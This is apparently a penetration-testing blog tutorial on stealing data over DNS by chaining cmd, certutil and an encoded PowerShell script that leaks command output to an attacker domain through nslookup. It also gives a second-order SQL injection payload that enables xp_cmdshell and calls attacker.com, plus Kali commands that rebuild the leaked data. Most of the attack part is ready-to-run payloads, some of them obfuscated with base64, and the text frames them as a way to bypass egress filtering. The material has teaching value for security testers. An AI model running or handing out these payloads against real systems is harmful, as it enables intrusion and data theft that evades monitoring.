PowerShell — Data Ex-filtration over DNS (OOB)
increasingly, companies considering security a top priority and ex-filtration of data are more restricted.
The OOB techniques often useful in a blind vulnerability , as an attacker you don’t get the output of exploit in direct response , for instance in a web-app vulnerable to blind injection . an attacker require a entity to generate an outbound TCP/UDP/ICMP request and that will then allow an attacker to exfiltrate data
For this purpose , as an attacker utilizing a built in system tool with less privileges and one-liner payloads to achieve malicious objective.
The DNS protocol is an excellent channel. It is Less monitored in comparison to other Internet protocols like . HTTP, FTP for posing a lesser risk. Thus, it has higher chance of bypassing egress filtering
Egress filtering: is the practice of monitoring and potentially restricting the flow of information outbound from one network to another
Challenges
- The DNS protocol restricts queries (i.e. outbound messages) to 255 bytes of letters, digits, and hyphens
- DNS protocol is used mostly over the User Datagram Protocol (UDP), there is no guarantee that queries will be replied based on their order of arrival
- Maximum length of Subdomain label is 63 characters Overcoming previous challenges Generic process for DNS Ex-filtration.
Overcoming previous challenges Generic process for DNS Ex-filtration
Payload in parts;
The payload created is as shown below. It will send output of ipconfig over DNS to dnspent.redacted.com
cmd /v /c ipconfig > C:\Windows\Temp\output70 && certutil -encodehex -f C:\Windows\Temp\output70 C:\Windows\Temp\output70.hex 4 && powershell.exe -exec bypass -enc JAB0AGUAeAB0AD0ARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABvAHUAdABwAHUAdAA3ADAALgBoAGUAeAA7ACQAcwB1AGIAZABvAG0AYQBpAG4APQAkAHQAZQB4AHQALgByAGUAcABsAGEAYwBlACgAIgAgACIALAAiACIAKQA7ACQAagA9ADEAMQAxADEAMQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHMAdQBiAGQAbwBtAGEAaQBuACkAewAgACQAZgBpAG4AYQBsAD0AJABqAC4AdABvAHMAdAByAGkAbgBnACgAKQArACIALgAiACsAJABpACsAIgAuAGYAaQBsAGUALgB1AHMAZQByADcAMAAuAHcAZQBiAGgAYQBjAGsAbABhAGIALgBjAG8AbQAiADsAJABqACAAKwA9ACAAMQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBvAE4AZQB3AFcAaQBuAGQAbwB3ACAAbgBzAGwAbwBvAGsAdQBwACAAJABmAGkAbgBhAGwAIAB9AA==
[#] Let’s understand the payload in parts:
cmd /v /c “ipconfig > C:\Windows\Temp\outab && certutil -encodehex -f C:\Windows\Temp\outab C:\Windows\Temp\outab.hex 4
above command write the output to a file, then hexencode it with ‘certutil’ in a specific format (in columns with spaces, without the characters and the addresses), and is represented by code 4.
This will be the Hex value you can decode it using: https://gchq.github.io/CyberChef “ HEX”
Second part: It will run a PowerShell script in Base64 encoded format to avoid breaking syntax when its injected in web app due to escaping or breaking SQL query. This script will read the hex encoded output file, break the content into chunks and then generate DNS queries in specific format i.e.
powershell.exe -exec bypass -enc JAB0AGUAeAB0AD0ARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAQwA6AFwAVQBzAGUAcgBzAFwASQBSAEgAUABcAEQAZQBzAGsAdABvAHAAXABvAHUAdABwAHUAdAA3ADAALgBoAGUAeAA7ACQAcwB1AGIAZABvAG0AYQBpAG4APQAkAHQAZQB4AHQALgByAGUAcABsAGEAYwBlACgAIgAgACIALAAiACIAKQA7ACQAagA9ADEAMQAxADEAMQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHMAdQBiAGQAbwBtAGEAaQBuACkAewAgACQAZgBpAG4AYQBsAD0AJABqAC4AdABvAHMAdAByAGkAbgBnACgAKQArACIALgAiACsAJABpACsAIgAuAGYAaQBsAGUALgBkAG4AcwBwAGUAbgAuAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtACIAOwAkAGoAIAArAD0AIAAxADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAIABuAHMAbABvAG8AawB1AHAAIAAkAGYAaQBuAGEAbAAgAH0A
Plain Script:
$text=Get-Content C:\Windows\Temp\output70.hex;$subdomain=$text.replace(“ “,””);$j=11111;foreach($i in $subdomain){ $final=$j.tostring()+”.”+$i+”.file.dnspen.redacted.com”;$j += 1; Start-Process -NoNewWindow nslookup $final }
Note: This is not a normal base64 encoder! converts the string to UTF-16LE first before encoding, as that is what PowerShell expects! To execute
Powershell.exe -exec bypass -enc {$encoded_script}
cmd:>cmd /v /c “ipconfig > C:\Users\IRHP\Desktop\output70 && certutil -encodehex -f C:\Users\IRHP\Desktop\output70 C:\Users\IRHP\Desktop\output70.hex 4 && powershell -exec bypass -enc JAB0AGUAeAB0AD0ARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAQwA6AFwAVQBzAGUAcgBzAFwASQBSAEgAUABcAEQAZQBzAGsAdABvAHAAXABvAHUAdABwAHUAdAA3ADAALgBoAGUAeAA7ACQAcwB1AGIAZABvAG0AYQBpAG4APQAkAHQAZQB4AHQALgByAGUAcABsAGEAYwBlACgAIgAgACIALAAiACIAKQA7ACQAagA9ADEAMQAxADEAMQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAIABpAG4AIAAkAHMAdQBiAGQAbwBtAGEAaQBuACkAewAgACQAZgBpAG4AYQBsAD0AJABqAC4AdABvAHMAdAByAGkAbgBnACgAKQArACIALgAiACsAJABpACsAIgAuAGYAaQBsAGUALgBkAG4AcwBwAGUAbgAuAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtACIAOwAkAGoAIAArAD0AIAAxADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAIABuAHMAbABvAG8AawB1AHAAIAAkAGYAaQBuAGEAbAAgAH0A
Data Ex-filtration over DNS via SQLi
when exploiting blind injection or second order <SQL injection>
Exploit this further to Retrieve the data using out-of-band (OOB) channels — DNS.
Start a DNS listener on your Kali
In order to execute command in SQL server via web app vulnerable to SQL injection you need to ensure xp_cmdshell is enabled in the backend.
Below is a second order SQL injection which value filled in secure update profile
‘;exec sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC
sp_configure ‘xp_cmdshell’, 1;RECONFIGURE; —‘;exec master..xp_cmdshell ‘cmd.exe /c nslookup tester.dnspenX.attacker.com’; —
Exploitation ;
Start DNS listener to save output in file when doing ex-filtration
As there is a limit on size and type of data that can be sent over DNS channels, we need to used above created payload that will encode the output, break it into chunks and then send it over the DNS channel with sequence numbers appended to them
Once the OOB calls are received, the output can be sorted with the help of sequence numbers as UDP packets do not have an arrival order
root@Kali:~# tcpdump -n udp port 53 -i any | tee oob.txt
Extract plain-text data from file
root@Kali:~# egrep -o ‘[0–9]{5}+\.+[0–9a-fA-F]{0,62}’ oob.txt|sort -u|cut -d. -f2|xxd -r -p
References ;
https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1
https://github.com/Arno0x/DNSExfiltrator
https://pentest.blog/data-ex-filtration-with-dns-in-sqli-attacks/https://isc.sans.edu/forums/diary/Exfiltrating+data+from+very+isolated+environments/23645/
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
https://adsecurity.org/?p=478
https://raikia.com/tool-powershell-encoder/